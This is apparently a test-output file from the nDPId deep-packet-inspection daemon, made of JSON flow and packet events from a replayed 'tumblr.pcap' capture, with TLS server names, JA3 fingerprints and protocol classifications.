-00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"thread_ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"thread_ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24118,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605292122163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122163,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuW0O3zbp+IuQs5oBJXgJ7NAAACBAV4AQMDAwQCCArC3d\/9EsEnyA=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24126,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605292122163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122163,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5Cznt826ggBAB+yKbAAABAQgKEsEoDMLd3\/0="} -00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122095,"flow_last_seen":1605292122163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122163,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24239,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122064,"flow_last_seen":1605292122177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122095,"flow_last_seen":1605292122212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24626,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605292122439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":203,"pkt_l4_len":149,"thread_ts_msec":1605292122439,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRAJUGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v3+ZlfzugBgB9aL3AAABAQgKG7m5ccLd3lMXAwMAcFVxaXihuhejZCNpZ5nuv6bEN9Yj5XMBxAt2QHwyRgmT6ybDwC5C73DyglYgxmIhMzt282zpUtE5GphT7ONBXskP6qssi1eNQHysgmBFeTvR+6kSeL0yhYhtFPIEYfWd8KPo3wOHIQIgFNXMNqMrZ9Q="} -00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605292122501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":149,"pkt_l4_len":95,"thread_ts_msec":1605292122501,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMAF8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoadXXNVgBgB9QaPAAABAQgKTYUvYcLdm\/0XAwMAOgAAAAAAAAAIvZM7k4G8cjK7Q9\/YrVI4eMbPvi74lWEwjtUtgcQJsZEKgX5x1KPe5+ARIWOSp6YRK8o="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122674,"flow_last_seen":1605292122674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605292122674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122674,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9u8AAAAAoAL9IJXTAAACBAWgBAIIChNnJ60AAAAAAQMDBw=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24691,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605292122697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY\/FghbGM8FfbwoBJXgNHxAAACBAV4AQMDAwQCCArC3eI6E2cnrQ=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24692,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605292122698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9vBYIWxkgBAB+1XrAAABAQgKE2cnxcLd4jo="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24693,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122674,"flow_last_seen":1605292122698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122698,"flow_last_seen":1605292122698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605292122698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gCuvGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoVprIBu3ASIMYXhL6qgBAB9S93AAABAQgKNSTnjcLdLMU="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24706,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605292122741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122741,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAEpymhUqAcsBIEmLB5kd7IUo3\/YpAbumsheEvqpwEiDHgBALdyXtAAABAQgKwt3iZjUkMfM="} -00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24707,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122674,"flow_last_seen":1605292122755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292122755,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122874,"flow_last_seen":1605292122874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122874,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605292122874,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122874,"pkt":"qtsDr8lk5EKm5WPyht1gDJQ7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnP4Bu4CgSN\/gvLosgBAB9qrlAAABAQgK1OQQnsLdMvM="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605292122899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122899,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuc\/uC8uiyAoEjggBALQrp6AAABAQgKwt3jAtThR68="} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118714,"flow_last_seen":1605292118786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118714,"flow_last_seen":1605292118786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1605292102602,"flow_last_seen":1605292122470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":35234,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102219,"flow_last_seen":1605292102653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102219,"flow_last_seen":1605292102653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 